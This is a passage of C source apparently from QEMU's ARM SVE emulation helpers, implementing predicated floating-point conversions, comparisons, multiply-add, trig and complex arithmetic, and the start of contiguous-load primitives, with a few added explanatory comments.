*/ static inline float32 sve_f16_to_f32(float16 f, float_status *fpst) { flag save = get_flush_inputs_to_zero(fpst); float32 ret; set_flush_inputs_to_zero(false, fpst); ret = float16_to_float32(f, true, fpst); set_flush_inputs_to_zero(save, fpst); return ret; } static inline float64 sve_f16_to_f64(float16 f, float_status *fpst) { flag save = get_flush_inputs_to_zero(fpst); float64 ret; set_flush_inputs_to_zero(false, fpst); ret = float16_to_float64(f, true, fpst); set_flush_inputs_to_zero(save, fpst); return ret; } static inline float16 sve_f32_to_f16(float32 f, float_status *fpst) { flag save = get_flush_to_zero(fpst); float16 ret; set_flush_to_zero(false, fpst); ret = float32_to_float16(f, true, fpst); set_flush_to_zero(save, fpst); return ret; } static inline float16 sve_f64_to_f16(float64 f, float_status *fpst) { flag save = get_flush_to_zero(fpst); float16 ret; set_flush_to_zero(false, fpst); ret = float64_to_float16(f, true, fpst); set_flush_to_zero(save, fpst); return ret; } static inline int16_t vfp_float16_to_int16_rtz(float16 f, float_status *s) { if (float16_is_any_nan(f)) { float_raise(float_flag_invalid, s); return 0; } return float16_to_int16_round_to_zero(f, s); } static inline int64_t vfp_float16_to_int64_rtz(float16 f, float_status *s) { if (float16_is_any_nan(f)) { float_raise(float_flag_invalid, s); return 0; } return float16_to_int64_round_to_zero(f, s); } static inline int64_t vfp_float32_to_int64_rtz(float32 f, float_status *s) { if (float32_is_any_nan(f)) { float_raise(float_flag_invalid, s); return 0; } return float32_to_int64_round_to_zero(f, s); } static inline int64_t vfp_float64_to_int64_rtz(float64 f, float_status *s) { if (float64_is_any_nan(f)) { float_raise(float_flag_invalid, s); return 0; } return float64_to_int64_round_to_zero(f, s); } static inline uint16_t vfp_float16_to_uint16_rtz(float16 f, float_status *s) { if (float16_is_any_nan(f)) { float_raise(float_flag_invalid, s); return 0; } return float16_to_uint16_round_to_zero(f, s); } static inline uint64_t vfp_float16_to_uint64_rtz(float16 f, float_status *s) { if (float16_is_any_nan(f)) { float_raise(float_flag_invalid, s); return 0; } return float16_to_uint64_round_to_zero(f, s); } static inline uint64_t vfp_float32_to_uint64_rtz(float32 f, float_status *s) { if (float32_is_any_nan(f)) { float_raise(float_flag_invalid, s); return 0; } return float32_to_uint64_round_to_zero(f, s); } static inline uint64_t vfp_float64_to_uint64_rtz(float64 f, float_status *s) { if (float64_is_any_nan(f)) { float_raise(float_flag_invalid, s); return 0; } return float64_to_uint64_round_to_zero(f, s); } DO_ZPZ_FP(sve_fcvt_sh, uint32_t, H1_4, sve_f32_to_f16) DO_ZPZ_FP(sve_fcvt_hs, uint32_t, H1_4, sve_f16_to_f32) DO_ZPZ_FP(sve_fcvt_dh, uint64_t, , sve_f64_to_f16) DO_ZPZ_FP(sve_fcvt_hd, uint64_t, , sve_f16_to_f64) DO_ZPZ_FP(sve_fcvt_ds, uint64_t, , float64_to_float32) DO_ZPZ_FP(sve_fcvt_sd, uint64_t, , float32_to_float64) DO_ZPZ_FP(sve_fcvtzs_hh, uint16_t, H1_2, vfp_float16_to_int16_rtz) DO_ZPZ_FP(sve_fcvtzs_hs, uint32_t, H1_4, helper_vfp_tosizh) DO_ZPZ_FP(sve_fcvtzs_ss, uint32_t, H1_4, helper_vfp_tosizs) DO_ZPZ_FP(sve_fcvtzs_hd, uint64_t, , vfp_float16_to_int64_rtz) DO_ZPZ_FP(sve_fcvtzs_sd, uint64_t, , vfp_float32_to_int64_rtz) DO_ZPZ_FP(sve_fcvtzs_ds, uint64_t, , helper_vfp_tosizd) DO_ZPZ_FP(sve_fcvtzs_dd, uint64_t, , vfp_float64_to_int64_rtz) DO_ZPZ_FP(sve_fcvtzu_hh, uint16_t, H1_2, vfp_float16_to_uint16_rtz) DO_ZPZ_FP(sve_fcvtzu_hs, uint32_t, H1_4, helper_vfp_touizh) DO_ZPZ_FP(sve_fcvtzu_ss, uint32_t, H1_4, 
helper_vfp_touizs) DO_ZPZ_FP(sve_fcvtzu_hd, uint64_t, , vfp_float16_to_uint64_rtz) DO_ZPZ_FP(sve_fcvtzu_sd, uint64_t, , vfp_float32_to_uint64_rtz) DO_ZPZ_FP(sve_fcvtzu_ds, uint64_t, , helper_vfp_touizd) DO_ZPZ_FP(sve_fcvtzu_dd, uint64_t, , vfp_float64_to_uint64_rtz) DO_ZPZ_FP(sve_frint_h, uint16_t, H1_2, helper_advsimd_rinth) DO_ZPZ_FP(sve_frint_s, uint32_t, H1_4, helper_rints) DO_ZPZ_FP(sve_frint_d, uint64_t, , helper_rintd) DO_ZPZ_FP(sve_frintx_h, uint16_t, H1_2, float16_round_to_int) DO_ZPZ_FP(sve_frintx_s, uint32_t, H1_4, float32_round_to_int) DO_ZPZ_FP(sve_frintx_d, uint64_t, , float64_round_to_int) DO_ZPZ_FP(sve_frecpx_h, uint16_t, H1_2, helper_frecpx_f16) DO_ZPZ_FP(sve_frecpx_s, uint32_t, H1_4, helper_frecpx_f32) DO_ZPZ_FP(sve_frecpx_d, uint64_t, , helper_frecpx_f64) DO_ZPZ_FP(sve_fsqrt_h, uint16_t, H1_2, float16_sqrt) DO_ZPZ_FP(sve_fsqrt_s, uint32_t, H1_4, float32_sqrt) DO_ZPZ_FP(sve_fsqrt_d, uint64_t, , float64_sqrt) DO_ZPZ_FP(sve_scvt_hh, uint16_t, H1_2, int16_to_float16) DO_ZPZ_FP(sve_scvt_sh, uint32_t, H1_4, int32_to_float16) DO_ZPZ_FP(sve_scvt_ss, uint32_t, H1_4, int32_to_float32) DO_ZPZ_FP(sve_scvt_sd, uint64_t, , int32_to_float64) DO_ZPZ_FP(sve_scvt_dh, uint64_t, , int64_to_float16) DO_ZPZ_FP(sve_scvt_ds, uint64_t, , int64_to_float32) DO_ZPZ_FP(sve_scvt_dd, uint64_t, , int64_to_float64) DO_ZPZ_FP(sve_ucvt_hh, uint16_t, H1_2, uint16_to_float16) DO_ZPZ_FP(sve_ucvt_sh, uint32_t, H1_4, uint32_to_float16) DO_ZPZ_FP(sve_ucvt_ss, uint32_t, H1_4, uint32_to_float32) DO_ZPZ_FP(sve_ucvt_sd, uint64_t, , uint32_to_float64) DO_ZPZ_FP(sve_ucvt_dh, uint64_t, , uint64_to_float16) DO_ZPZ_FP(sve_ucvt_ds, uint64_t, , uint64_to_float32) DO_ZPZ_FP(sve_ucvt_dd, uint64_t, , uint64_to_float64) #undef DO_ZPZ_FP /* 4-operand predicated multiply-add. This requires 7 operands to pass * "properly", so we need to encode some of the registers into DESC. 
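 */

/*
 * Editorial sketch (not part of the original source): a hypothetical
 * encoder matching the extract32() calls below -- five bits per
 * register number, packed immediately above SIMD_DATA_SHIFT.  The
 * QEMU_BUILD_BUG_ON that follows checks that all 20 bits fit in the
 * 32-bit descriptor.
 */
#if 0
static uint32_t encode_fmla_desc(uint32_t desc, unsigned rd, unsigned rn,
                                 unsigned rm, unsigned ra)
{
    desc |= rd << SIMD_DATA_SHIFT;       /* bits [4:0] of the data field */
    desc |= rn << (SIMD_DATA_SHIFT + 5);
    desc |= rm << (SIMD_DATA_SHIFT + 10);
    desc |= ra << (SIMD_DATA_SHIFT + 15);
    return desc;
}
#endif

/*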
*/ QEMU_BUILD_BUG_ON(SIMD_DATA_SHIFT + 20 > 32); static void do_fmla_zpzzz_h(CPUARMState *env, void *vg, uint32_t desc, uint16_t neg1, uint16_t neg3) { intptr_t i = simd_oprsz(desc); unsigned rd = extract32(desc, SIMD_DATA_SHIFT, 5); unsigned rn = extract32(desc, SIMD_DATA_SHIFT + 5, 5); unsigned rm = extract32(desc, SIMD_DATA_SHIFT + 10, 5); unsigned ra = extract32(desc, SIMD_DATA_SHIFT + 15, 5); void *vd = &env->vfp.zregs[rd]; void *vn = &env->vfp.zregs[rn]; void *vm = &env->vfp.zregs[rm]; void *va = &env->vfp.zregs[ra]; uint64_t *g = vg; do { uint64_t pg = g[(i - 1) >> 6]; do { i -= 2; if (likely((pg >> (i & 63)) & 1)) { float16 e1, e2, e3, r; e1 = *(uint16_t *)((char *)vn + H1_2(i)) ^ neg1; e2 = *(uint16_t *)((char *)vm + H1_2(i)); e3 = *(uint16_t *)((char *)va + H1_2(i)) ^ neg3; r = float16_muladd(e1, e2, e3, 0, &env->vfp.fp_status_f16); *(uint16_t *)((char *)vd + H1_2(i)) = r; } } while (i & 63); } while (i != 0); } void HELPER(sve_fmla_zpzzz_h)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_h(env, vg, desc, 0, 0); } void HELPER(sve_fmls_zpzzz_h)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_h(env, vg, desc, 0x8000, 0); } void HELPER(sve_fnmla_zpzzz_h)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_h(env, vg, desc, 0x8000, 0x8000); } void HELPER(sve_fnmls_zpzzz_h)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_h(env, vg, desc, 0, 0x8000); } static void do_fmla_zpzzz_s(CPUARMState *env, void *vg, uint32_t desc, uint32_t neg1, uint32_t neg3) { intptr_t i = simd_oprsz(desc); unsigned rd = extract32(desc, SIMD_DATA_SHIFT, 5); unsigned rn = extract32(desc, SIMD_DATA_SHIFT + 5, 5); unsigned rm = extract32(desc, SIMD_DATA_SHIFT + 10, 5); unsigned ra = extract32(desc, SIMD_DATA_SHIFT + 15, 5); void *vd = &env->vfp.zregs[rd]; void *vn = &env->vfp.zregs[rn]; void *vm = &env->vfp.zregs[rm]; void *va = &env->vfp.zregs[ra]; uint64_t *g = vg; do { uint64_t pg = g[(i - 1) >> 6]; do { i -= 4; if (likely((pg >> (i & 63)) & 1)) { float32 e1, e2, e3, r; e1 = *(uint32_t *)((char *)vn + H1_4(i)) ^ neg1; e2 = *(uint32_t *)((char *)vm + H1_4(i)); e3 = *(uint32_t *)((char *)va + H1_4(i)) ^ neg3; r = float32_muladd(e1, e2, e3, 0, &env->vfp.fp_status); *(uint32_t *)((char *)vd + H1_4(i)) = r; } } while (i & 63); } while (i != 0); } void HELPER(sve_fmla_zpzzz_s)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_s(env, vg, desc, 0, 0); } void HELPER(sve_fmls_zpzzz_s)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_s(env, vg, desc, 0x80000000, 0); } void HELPER(sve_fnmla_zpzzz_s)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_s(env, vg, desc, 0x80000000, 0x80000000); } void HELPER(sve_fnmls_zpzzz_s)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_s(env, vg, desc, 0, 0x80000000); } static void do_fmla_zpzzz_d(CPUARMState *env, void *vg, uint32_t desc, uint64_t neg1, uint64_t neg3) { intptr_t i = simd_oprsz(desc); unsigned rd = extract32(desc, SIMD_DATA_SHIFT, 5); unsigned rn = extract32(desc, SIMD_DATA_SHIFT + 5, 5); unsigned rm = extract32(desc, SIMD_DATA_SHIFT + 10, 5); unsigned ra = extract32(desc, SIMD_DATA_SHIFT + 15, 5); void *vd = &env->vfp.zregs[rd]; void *vn = &env->vfp.zregs[rn]; void *vm = &env->vfp.zregs[rm]; void *va = &env->vfp.zregs[ra]; uint64_t *g = vg; do { uint64_t pg = g[(i - 1) >> 6]; do { i -= 8; if (likely((pg >> (i & 63)) & 1)) { float64 e1, e2, e3, r; e1 = *(uint64_t *)((char *)vn + i) ^ neg1; e2 = *(uint64_t *)((char *)vm + i); e3 = *(uint64_t *)((char *)va + i) ^ neg3; r = float64_muladd(e1, e2, 
e3, 0, &env->vfp.fp_status); *(uint64_t *)((char *)vd + i) = r; } } while (i & 63); } while (i != 0); } void HELPER(sve_fmla_zpzzz_d)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_d(env, vg, desc, 0, 0); } void HELPER(sve_fmls_zpzzz_d)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_d(env, vg, desc, INT64_MIN, 0); } void HELPER(sve_fnmla_zpzzz_d)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_d(env, vg, desc, INT64_MIN, INT64_MIN); } void HELPER(sve_fnmls_zpzzz_d)(CPUARMState *env, void *vg, uint32_t desc) { do_fmla_zpzzz_d(env, vg, desc, 0, INT64_MIN); } /* Two operand floating-point comparison controlled by a predicate. * Unlike the integer version, we are not allowed to optimistically * compare operands, since the comparison may have side effects wrt * the FPSR. */ #define DO_FPCMP_PPZZ(NAME, TYPE, H, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vm, void *vg, \ void *status, uint32_t desc) \ { \ intptr_t i = simd_oprsz(desc), j = (i - 1) >> 6; \ uint64_t *d = vd, *g = vg; \ do { \ uint64_t out = 0, pg = g[j]; \ do { \ i -= sizeof(TYPE), out <<= sizeof(TYPE); \ if (likely((pg >> (i & 63)) & 1)) { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ TYPE mm = *(TYPE *)((char *)vm + H(i)); \ out |= OP(TYPE, nn, mm, status); \ } \ } while (i & 63); \ d[j--] = out; \ } while (i > 0); \ } #define DO_FPCMP_PPZZ_H(NAME, OP) \ DO_FPCMP_PPZZ(NAME##_h, float16, H1_2, OP) #define DO_FPCMP_PPZZ_S(NAME, OP) \ DO_FPCMP_PPZZ(NAME##_s, float32, H1_4, OP) #define DO_FPCMP_PPZZ_D(NAME, OP) \ DO_FPCMP_PPZZ(NAME##_d, float64, , OP) #define DO_FPCMP_PPZZ_ALL(NAME, OP) \ DO_FPCMP_PPZZ_H(NAME, OP) \ DO_FPCMP_PPZZ_S(NAME, OP) \ DO_FPCMP_PPZZ_D(NAME, OP) #define DO_FCMGE(TYPE, X, Y, ST) TYPE##_compare(Y, X, ST) <= 0 #define DO_FCMGT(TYPE, X, Y, ST) TYPE##_compare(Y, X, ST) < 0 #define DO_FCMLE(TYPE, X, Y, ST) TYPE##_compare(X, Y, ST) <= 0 #define DO_FCMLT(TYPE, X, Y, ST) TYPE##_compare(X, Y, ST) < 0 #define DO_FCMEQ(TYPE, X, Y, ST) TYPE##_compare_quiet(X, Y, ST) == 0 #define DO_FCMNE(TYPE, X, Y, ST) TYPE##_compare_quiet(X, Y, ST) != 0 #define DO_FCMUO(TYPE, X, Y, ST) \ TYPE##_compare_quiet(X, Y, ST) == float_relation_unordered #define DO_FACGE(TYPE, X, Y, ST) \ TYPE##_compare(TYPE##_abs(Y), TYPE##_abs(X), ST) <= 0 #define DO_FACGT(TYPE, X, Y, ST) \ TYPE##_compare(TYPE##_abs(Y), TYPE##_abs(X), ST) < 0 DO_FPCMP_PPZZ_ALL(sve_fcmge, DO_FCMGE) DO_FPCMP_PPZZ_ALL(sve_fcmgt, DO_FCMGT) DO_FPCMP_PPZZ_ALL(sve_fcmeq, DO_FCMEQ) DO_FPCMP_PPZZ_ALL(sve_fcmne, DO_FCMNE) DO_FPCMP_PPZZ_ALL(sve_fcmuo, DO_FCMUO) DO_FPCMP_PPZZ_ALL(sve_facge, DO_FACGE) DO_FPCMP_PPZZ_ALL(sve_facgt, DO_FACGT) #undef DO_FPCMP_PPZZ_ALL #undef DO_FPCMP_PPZZ_D #undef DO_FPCMP_PPZZ_S #undef DO_FPCMP_PPZZ_H #undef DO_FPCMP_PPZZ /* One operand floating-point comparison against zero, controlled * by a predicate. 
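 *
 * Editorial note: the DO_FCM* operations are shared with the
 * two-operand forms above.  The ordered comparisons (GE/GT/LE/LT and
 * the absolute-value FAC* forms) use the signalling TYPE##_compare,
 * which raises Invalid for any NaN operand; EQ, NE and UO use the
 * quiet variant, which raises Invalid only for signalling NaNs, as
 * the architecture requires.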
*/ #define DO_FPCMP_PPZ0(NAME, TYPE, H, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vg, \ void *status, uint32_t desc) \ { \ intptr_t i = simd_oprsz(desc), j = (i - 1) >> 6; \ uint64_t *d = vd, *g = vg; \ do { \ uint64_t out = 0, pg = g[j]; \ do { \ i -= sizeof(TYPE), out <<= sizeof(TYPE); \ if ((pg >> (i & 63)) & 1) { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ out |= OP(TYPE, nn, 0, status); \ } \ } while (i & 63); \ d[j--] = out; \ } while (i > 0); \ } #define DO_FPCMP_PPZ0_H(NAME, OP) \ DO_FPCMP_PPZ0(NAME##_h, float16, H1_2, OP) #define DO_FPCMP_PPZ0_S(NAME, OP) \ DO_FPCMP_PPZ0(NAME##_s, float32, H1_4, OP) #define DO_FPCMP_PPZ0_D(NAME, OP) \ DO_FPCMP_PPZ0(NAME##_d, float64, , OP) #define DO_FPCMP_PPZ0_ALL(NAME, OP) \ DO_FPCMP_PPZ0_H(NAME, OP) \ DO_FPCMP_PPZ0_S(NAME, OP) \ DO_FPCMP_PPZ0_D(NAME, OP) DO_FPCMP_PPZ0_ALL(sve_fcmge0, DO_FCMGE) DO_FPCMP_PPZ0_ALL(sve_fcmgt0, DO_FCMGT) DO_FPCMP_PPZ0_ALL(sve_fcmle0, DO_FCMLE) DO_FPCMP_PPZ0_ALL(sve_fcmlt0, DO_FCMLT) DO_FPCMP_PPZ0_ALL(sve_fcmeq0, DO_FCMEQ) DO_FPCMP_PPZ0_ALL(sve_fcmne0, DO_FCMNE) /* FP Trig Multiply-Add. */ void HELPER(sve_ftmad_h)(void *vd, void *vn, void *vm, void *vs, uint32_t desc) { static const float16 coeff[16] = { 0x3c00, 0xb155, 0x2030, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3c00, 0xb800, 0x293a, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, }; intptr_t i, opr_sz = simd_oprsz(desc) / sizeof(float16); intptr_t x = simd_data(desc); float16 *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; i++) { float16 mm = m[i]; intptr_t xx = x; if (float16_is_neg(mm)) { mm = float16_abs(mm); xx += 8; } d[i] = float16_muladd(n[i], mm, coeff[xx], 0, vs); } } void HELPER(sve_ftmad_s)(void *vd, void *vn, void *vm, void *vs, uint32_t desc) { static const float32 coeff[16] = { 0x3f800000, 0xbe2aaaab, 0x3c088886, 0xb95008b9, 0x36369d6d, 0x00000000, 0x00000000, 0x00000000, 0x3f800000, 0xbf000000, 0x3d2aaaa6, 0xbab60705, 0x37cd37cc, 0x00000000, 0x00000000, 0x00000000, }; intptr_t i, opr_sz = simd_oprsz(desc) / sizeof(float32); intptr_t x = simd_data(desc); float32 *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; i++) { float32 mm = m[i]; intptr_t xx = x; if (float32_is_neg(mm)) { mm = float32_abs(mm); xx += 8; } d[i] = float32_muladd(n[i], mm, coeff[xx], 0, vs); } } void HELPER(sve_ftmad_d)(void *vd, void *vn, void *vm, void *vs, uint32_t desc) { static const float64 coeff[16] = { 0x3ff0000000000000ull, 0xbfc5555555555543ull, 0x3f8111111110f30cull, 0xbf2a01a019b92fc6ull, 0x3ec71de351f3d22bull, 0xbe5ae5e2b60f7b91ull, 0x3de5d8408868552full, 0x0000000000000000ull, 0x3ff0000000000000ull, 0xbfe0000000000000ull, 0x3fa5555555555536ull, 0xbf56c16c16c13a0bull, 0x3efa01a019b1e8d8ull, 0xbe927e4f7282f468ull, 0x3e21ee96d2641b13ull, 0xbda8f76380fbb401ull, }; intptr_t i, opr_sz = simd_oprsz(desc) / sizeof(float64); intptr_t x = simd_data(desc); float64 *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; i++) { float64 mm = m[i]; intptr_t xx = x; if (float64_is_neg(mm)) { mm = float64_abs(mm); xx += 8; } d[i] = float64_muladd(n[i], mm, coeff[xx], 0, vs); } } /* * FP Complex Add */ void HELPER(sve_fcadd_h)(void *vd, void *vn, void *vm, void *vg, void *vs, uint32_t desc) { intptr_t j, i = simd_oprsz(desc); uint64_t *g = vg; float16 neg_imag = float16_set_sign(0, simd_data(desc)); float16 neg_real = float16_chs(neg_imag); do { uint64_t pg = g[(i - 1) >> 6]; do { float16 e0, e1, e2, e3; /* I holds the real index; J holds the imag index. 
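 * Editorial note: the rot bit from simd_data() selects the rotation.
 * With the bit clear the result is (n_r - m_i) + i*(n_i + m_r), i.e.
 * m rotated by +90 degrees before the add; with the bit set the signs
 * swap and m is rotated by +270 degrees instead.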
*/ j = i - sizeof(float16); i -= 2 * sizeof(float16); e0 = *(float16 *)((char *)vn + H1_2(i)); e1 = *(float16 *)((char *)vm + H1_2(j)) ^ neg_real; e2 = *(float16 *)((char *)vn + H1_2(j)); e3 = *(float16 *)((char *)vm + H1_2(i)) ^ neg_imag; if (likely((pg >> (i & 63)) & 1)) { *(float16 *)((char *)vd + H1_2(i)) = float16_add(e0, e1, vs); } if (likely((pg >> (j & 63)) & 1)) { *(float16 *)((char *)vd + H1_2(j)) = float16_add(e2, e3, vs); } } while (i & 63); } while (i != 0); } void HELPER(sve_fcadd_s)(void *vd, void *vn, void *vm, void *vg, void *vs, uint32_t desc) { intptr_t j, i = simd_oprsz(desc); uint64_t *g = vg; float32 neg_imag = float32_set_sign(0, simd_data(desc)); float32 neg_real = float32_chs(neg_imag); do { uint64_t pg = g[(i - 1) >> 6]; do { float32 e0, e1, e2, e3; /* I holds the real index; J holds the imag index. */ j = i - sizeof(float32); i -= 2 * sizeof(float32); e0 = *(float32 *)((char *)vn + H1_2(i)); e1 = *(float32 *)((char *)vm + H1_2(j)) ^ neg_real; e2 = *(float32 *)((char *)vn + H1_2(j)); e3 = *(float32 *)((char *)vm + H1_2(i)) ^ neg_imag; if (likely((pg >> (i & 63)) & 1)) { *(float32 *)((char *)vd + H1_2(i)) = float32_add(e0, e1, vs); } if (likely((pg >> (j & 63)) & 1)) { *(float32 *)((char *)vd + H1_2(j)) = float32_add(e2, e3, vs); } } while (i & 63); } while (i != 0); } void HELPER(sve_fcadd_d)(void *vd, void *vn, void *vm, void *vg, void *vs, uint32_t desc) { intptr_t j, i = simd_oprsz(desc); uint64_t *g = vg; float64 neg_imag = float64_set_sign(0, simd_data(desc)); float64 neg_real = float64_chs(neg_imag); do { uint64_t pg = g[(i - 1) >> 6]; do { float64 e0, e1, e2, e3; /* I holds the real index; J holds the imag index. */ j = i - sizeof(float64); i -= 2 * sizeof(float64); e0 = *(float64 *)((char *)vn + H1_2(i)); e1 = *(float64 *)((char *)vm + H1_2(j)) ^ neg_real; e2 = *(float64 *)((char *)vn + H1_2(j)); e3 = *(float64 *)((char *)vm + H1_2(i)) ^ neg_imag; if (likely((pg >> (i & 63)) & 1)) { *(float64 *)((char *)vd + H1_2(i)) = float64_add(e0, e1, vs); } if (likely((pg >> (j & 63)) & 1)) { *(float64 *)((char *)vd + H1_2(j)) = float64_add(e2, e3, vs); } } while (i & 63); } while (i != 0); } /* * FP Complex Multiply */ QEMU_BUILD_BUG_ON(SIMD_DATA_SHIFT + 22 > 32); void HELPER(sve_fcmla_zpzzz_h)(CPUARMState *env, void *vg, uint32_t desc) { intptr_t j, i = simd_oprsz(desc); unsigned rd = extract32(desc, SIMD_DATA_SHIFT, 5); unsigned rn = extract32(desc, SIMD_DATA_SHIFT + 5, 5); unsigned rm = extract32(desc, SIMD_DATA_SHIFT + 10, 5); unsigned ra = extract32(desc, SIMD_DATA_SHIFT + 15, 5); unsigned rot = extract32(desc, SIMD_DATA_SHIFT + 20, 2); bool flip = rot & 1; float16 neg_imag, neg_real; void *vd = &env->vfp.zregs[rd]; void *vn = &env->vfp.zregs[rn]; void *vm = &env->vfp.zregs[rm]; void *va = &env->vfp.zregs[ra]; uint64_t *g = vg; neg_imag = float16_set_sign(0, (rot & 2) != 0); neg_real = float16_set_sign(0, rot == 1 || rot == 2); do { uint64_t pg = g[(i - 1) >> 6]; do { float16 e1, e2, e3, e4, nr, ni, mr, mi, d; /* I holds the real index; J holds the imag index. */ j = i - sizeof(float16); i -= 2 * sizeof(float16); nr = *(float16 *)((char *)vn + H1_2(i)); ni = *(float16 *)((char *)vn + H1_2(j)); mr = *(float16 *)((char *)vm + H1_2(i)); mi = *(float16 *)((char *)vm + H1_2(j)); e2 = (flip ? ni : nr); e1 = (flip ? mi : mr) ^ neg_real; e4 = e2; e3 = (flip ? 
mr : mi) ^ neg_imag; if (likely((pg >> (i & 63)) & 1)) { d = *(float16 *)((char *)va + H1_2(i)); d = float16_muladd(e2, e1, d, 0, &env->vfp.fp_status_f16); *(float16 *)((char *)vd + H1_2(i)) = d; } if (likely((pg >> (j & 63)) & 1)) { d = *(float16 *)((char *)va + H1_2(j)); d = float16_muladd(e4, e3, d, 0, &env->vfp.fp_status_f16); *(float16 *)((char *)vd + H1_2(j)) = d; } } while (i & 63); } while (i != 0); } void HELPER(sve_fcmla_zpzzz_s)(CPUARMState *env, void *vg, uint32_t desc) { intptr_t j, i = simd_oprsz(desc); unsigned rd = extract32(desc, SIMD_DATA_SHIFT, 5); unsigned rn = extract32(desc, SIMD_DATA_SHIFT + 5, 5); unsigned rm = extract32(desc, SIMD_DATA_SHIFT + 10, 5); unsigned ra = extract32(desc, SIMD_DATA_SHIFT + 15, 5); unsigned rot = extract32(desc, SIMD_DATA_SHIFT + 20, 2); bool flip = rot & 1; float32 neg_imag, neg_real; void *vd = &env->vfp.zregs[rd]; void *vn = &env->vfp.zregs[rn]; void *vm = &env->vfp.zregs[rm]; void *va = &env->vfp.zregs[ra]; uint64_t *g = vg; neg_imag = float32_set_sign(0, (rot & 2) != 0); neg_real = float32_set_sign(0, rot == 1 || rot == 2); do { uint64_t pg = g[(i - 1) >> 6]; do { float32 e1, e2, e3, e4, nr, ni, mr, mi, d; /* I holds the real index; J holds the imag index. */ j = i - sizeof(float32); i -= 2 * sizeof(float32); nr = *(float32 *)((char *)vn + H1_2(i)); ni = *(float32 *)((char *)vn + H1_2(j)); mr = *(float32 *)((char *)vm + H1_2(i)); mi = *(float32 *)((char *)vm + H1_2(j)); e2 = (flip ? ni : nr); e1 = (flip ? mi : mr) ^ neg_real; e4 = e2; e3 = (flip ? mr : mi) ^ neg_imag; if (likely((pg >> (i & 63)) & 1)) { d = *(float32 *)((char *)va + H1_2(i)); d = float32_muladd(e2, e1, d, 0, &env->vfp.fp_status); *(float32 *)((char *)vd + H1_2(i)) = d; } if (likely((pg >> (j & 63)) & 1)) { d = *(float32 *)((char *)va + H1_2(j)); d = float32_muladd(e4, e3, d, 0, &env->vfp.fp_status); *(float32 *)((char *)vd + H1_2(j)) = d; } } while (i & 63); } while (i != 0); } void HELPER(sve_fcmla_zpzzz_d)(CPUARMState *env, void *vg, uint32_t desc) { intptr_t j, i = simd_oprsz(desc); unsigned rd = extract32(desc, SIMD_DATA_SHIFT, 5); unsigned rn = extract32(desc, SIMD_DATA_SHIFT + 5, 5); unsigned rm = extract32(desc, SIMD_DATA_SHIFT + 10, 5); unsigned ra = extract32(desc, SIMD_DATA_SHIFT + 15, 5); unsigned rot = extract32(desc, SIMD_DATA_SHIFT + 20, 2); bool flip = rot & 1; float64 neg_imag, neg_real; void *vd = &env->vfp.zregs[rd]; void *vn = &env->vfp.zregs[rn]; void *vm = &env->vfp.zregs[rm]; void *va = &env->vfp.zregs[ra]; uint64_t *g = vg; neg_imag = float64_set_sign(0, (rot & 2) != 0); neg_real = float64_set_sign(0, rot == 1 || rot == 2); do { uint64_t pg = g[(i - 1) >> 6]; do { float64 e1, e2, e3, e4, nr, ni, mr, mi, d; /* I holds the real index; J holds the imag index. */ j = i - sizeof(float64); i -= 2 * sizeof(float64); nr = *(float64 *)((char *)vn + H1_2(i)); ni = *(float64 *)((char *)vn + H1_2(j)); mr = *(float64 *)((char *)vm + H1_2(i)); mi = *(float64 *)((char *)vm + H1_2(j)); e2 = (flip ? ni : nr); e1 = (flip ? mi : mr) ^ neg_real; e4 = e2; e3 = (flip ? mr : mi) ^ neg_imag; if (likely((pg >> (i & 63)) & 1)) { d = *(float64 *)((char *)va + H1_2(i)); d = float64_muladd(e2, e1, d, 0, &env->vfp.fp_status); *(float64 *)((char *)vd + H1_2(i)) = d; } if (likely((pg >> (j & 63)) & 1)) { d = *(float64 *)((char *)va + H1_2(j)); d = float64_muladd(e4, e3, d, 0, &env->vfp.fp_status); *(float64 *)((char *)vd + H1_2(j)) = d; } } while (i & 63); } while (i != 0); } /* * Load contiguous data, protected by a governing predicate. 
*/ /* * Load elements into @vd, controlled by @vg, from @host + @mem_ofs. * Memory is valid through @host + @mem_max. The register element * indicies are inferred from @mem_ofs, as modified by the types for * which the helper is built. Return the @mem_ofs of the first element * not loaded (which is @mem_max if they are all loaded). * * For softmmu, we have fully validated the guest page. For user-only, * we cannot fully validate without taking the mmap lock, but since we * know the access is within one host page, if any access is valid they * all must be valid. However, when @vg is all false, it may be that * no access is valid. */ typedef intptr_t sve_ld1_host_fn(void *vd, void *vg, void *host, intptr_t mem_ofs, intptr_t mem_max); /* * Load one element into @vd + @reg_off from (@env, @vaddr, @ra). * The controlling predicate is known to be true. */ typedef void sve_ld1_tlb_fn(CPUARMState *env, void *vd, intptr_t reg_off, target_ulong vaddr, TCGMemOpIdx oi, uintptr_t ra); typedef sve_ld1_tlb_fn sve_st1_tlb_fn; /* * Generate the above primitives. */ #define DO_LD_HOST(NAME, H, TYPEE, TYPEM, HOST) \ static intptr_t sve_##NAME##_host(void *vd, void *vg, void *host, \ intptr_t mem_off, const intptr_t mem_max) \ { \ intptr_t reg_off = mem_off * (sizeof(TYPEE) / sizeof(TYPEM)); \ uint64_t *pg = vg; \ while (mem_off + sizeof(TYPEM) <= mem_max) { \ TYPEM val = 0; \ if (likely((pg[reg_off >> 6] >> (reg_off & 63)) & 1)) { \ val = HOST((char *)host + mem_off); \ } \ *(TYPEE *)((char *)vd + H(reg_off)) = val; \ mem_off += sizeof(TYPEM), reg_off += sizeof(TYPEE); \ } \ return mem_off; \ } #define DO_LD_TLB(NAME, H, 